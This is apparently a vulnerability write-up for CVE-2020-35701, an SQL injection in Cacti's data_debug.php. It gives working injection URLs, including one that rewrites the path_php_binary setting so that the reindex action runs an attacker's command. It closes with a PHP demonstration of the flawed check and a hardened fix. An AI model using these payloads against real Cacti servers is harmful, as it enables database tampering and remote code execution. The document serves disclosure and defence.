CVE-2020-35701 – Cacti 1.2.0 – 1.2.16 SQL Injection

This one is pretty straightforward and was found fairly quickly.

An SQL injection in the latest version of Cacti (1.2.16 at the time of writing).

In order to trigger the vulnerability you only need to request this URL: cacti/data_debug.php?action=ajax_hosts&site_id=11SQLInjection

Because of PHP's loose comparison between strings and integers, the check:

if (get_request_var('site_id') > 0) {
   $sql_where = 'site_id = ' . get_request_var('site_id');
}

will pass for any value that starts with a number (the string is compared as the number it begins with, so 11SQLInjection > 0 is true), and the raw value is then concatenated straight into the WHERE clause. A payload such as 11) AS rs1) AS rs2 ON rs2.id = h1.id; select 1 # therefore closes the nested subqueries early, appends a second statement and comments out the remainder of the original query, so in the end the database is asked to execute the following (the injected part starts at 11), and everything after the # is the leftover of the original query):

SELECT h1.*
FROM host AS h1
         INNER JOIN (SELECT DISTINCT id
                     FROM (SELECT h.*, uap0.user_id AS user0, uap1.user_id AS user1, uap2.user_id AS user2
                           FROM host AS h
                                    LEFT JOIN graph_local AS gl ON h.id = gl.host_id
                                    LEFT JOIN graph_templates_graph AS gtg ON gl.id = gtg.local_graph_id
                                    LEFT JOIN graph_templates AS gt ON gt.id = gl.graph_template_id
                                    LEFT JOIN host_template AS ht ON h.host_template_id = ht.id
                                    LEFT JOIN user_auth_perms AS uap0
                                              ON (gl.id = uap0.item_id AND uap0.type = 1 AND uap0.user_id = 1)
                                    LEFT JOIN user_auth_perms AS uap1
                                              ON (gl.host_id = uap1.item_id AND uap1.type = 3 AND uap1.user_id = 1)
                                    LEFT JOIN user_auth_perms AS uap2
                                              ON (gl.graph_template_id = uap2.item_id AND uap2.type = 4 AND
                                                  uap2.user_id = 1)
                           WHERE site_id = 11) AS rs1) AS rs2 ON rs2.id = h1.id;
select 1 # AND hostname LIKE '%hostname%' OR description LIKE '%description%' OR notes LIKE '%notes%' AND h.disabled=''
          HAVING (user0 IS NULL OR (user1 IS NULL OR user2 IS NULL)) ) AS rs1 ) AS rs2
          ON rs2.id=h1.id
          ORDER BY description LIMIT 30

Since the second statement is under our control, we can swap the harmless select 1 for an UPDATE of Cacti's settings table. If we instead send something like this:

cacti/data_debug.php?action=ajax_hosts&site_id=11) AS rs1   ) AS rs2   ON rs2.id=h1.id;update settings set value='php -r "file_put_contents(\'/tmp/a\',\'aaa\'); "' where name='path_php_binary';-- -


the path_php_binary setting now holds our command instead of the real PHP binary. The reindex action runs that configured binary, so we get code execution (here, /tmp/a being written) as soon as we visit /cacti/host.php?action=reindex.
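The following is an added example, not code from the Cacti project or from the original write-up: a stand-alone PHP script that reproduces the vulnerable site_id check with its loose comparison, shows which inputs pass it, and puts a hardened version of the same check beside it. The get_request_var() stub, the sample $_GET value and the hardened_where() helper are assumptions made for this example, and the fix it shows (validate as an integer, then bind the value as a query parameter) is the standard pattern rather than a claim about the exact patch Cacti shipped.

```php
<?php
// Added example, not Cacti's own code: why the site_id check in
// data_debug.php does not stop the injection, and what a safe version of the
// same check looks like. get_request_var() below is a stand-in for Cacti's
// helper (it just returns the raw request value), and $_GET is constructed
// sample input, so the script runs on its own from the command line.

$_GET['site_id'] = '11) AS rs1 ) AS rs2 ON rs2.id = h1.id; select 1 #';

// Stand-in for Cacti's get_request_var(): hands back the raw request value.
function get_request_var(string $name): ?string
{
    return $_GET[$name] ?? null;
}

// The vulnerable check, as in Cacti 1.2.16: a loose numeric comparison
// followed by string concatenation into the WHERE clause.
function vulnerable_where(): string
{
    $sql_where = '';
    if (get_request_var('site_id') > 0) {   // '11) AS rs1 ...' > 0 is true
        $sql_where = 'site_id = ' . get_request_var('site_id');
    }
    return $sql_where;
}

// Hardened version (assumed helper, not Cacti's): validate the parameter as
// an integer first and hand the value to the database as a bound parameter
// instead of concatenating it. Returns null when the parameter is missing
// or not a positive integer, so no WHERE fragment is built at all.
function hardened_where(): ?array
{
    $site_id = filter_var(get_request_var('site_id'), FILTER_VALIDATE_INT);
    if ($site_id === false || $site_id <= 0) {
        return null;
    }
    return ['sql' => 'site_id = ?', 'params' => [$site_id]];
}

// The comparison behaviour itself, for the inputs that matter here.
// Note: 'abc' > 0 is false on PHP 7 but true on PHP 8, where an int compared
// with a non-numeric string is converted to a string first; the leading-digit
// payloads pass the check on both versions, which is the bug.
function comparison_table(): array
{
    $rows = [];
    foreach (['11', '11SQLInjection', '11) AS rs1 -- -', 'abc', '0'] as $v) {
        $rows[] = [
            'input'        => $v,
            'passes_check' => $v > 0,
            'validated'    => filter_var($v, FILTER_VALIDATE_INT),
        ];
    }
    return $rows;
}

foreach (comparison_table() as $r) {
    printf("%-24s passes check: %-5s validated: %s\n",
        var_export($r['input'], true),
        var_export($r['passes_check'], true),
        var_export($r['validated'], true));
}
echo 'vulnerable: ', vulnerable_where(), "\n";
echo 'hardened:   ', json_encode(hardened_where()), "\n";
```

Run it with php on the command line: the table shows that every value beginning with digits passes the loose check while only the plain "11" survives FILTER_VALIDATE_INT, the vulnerable clause comes back with the whole payload embedded, and the hardened clause is null for the payload because validation fails before any SQL is assembled.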